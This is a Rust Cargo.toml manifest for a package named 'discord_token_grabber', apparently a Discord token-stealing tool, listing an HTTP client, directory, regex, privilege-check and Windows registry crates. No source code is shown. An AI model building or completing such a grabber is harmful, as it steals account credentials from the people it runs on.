[package]
name = "discord_token_grabber"
version = "1.0.2"
authors = ["moneysake <moneysake@tutanota.com>"]
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
ureq = "1.1.1"
dirs = "2.0"
regex = "1.3.9"
is_elevated = "0.1.2"
winreg = "0.7.0"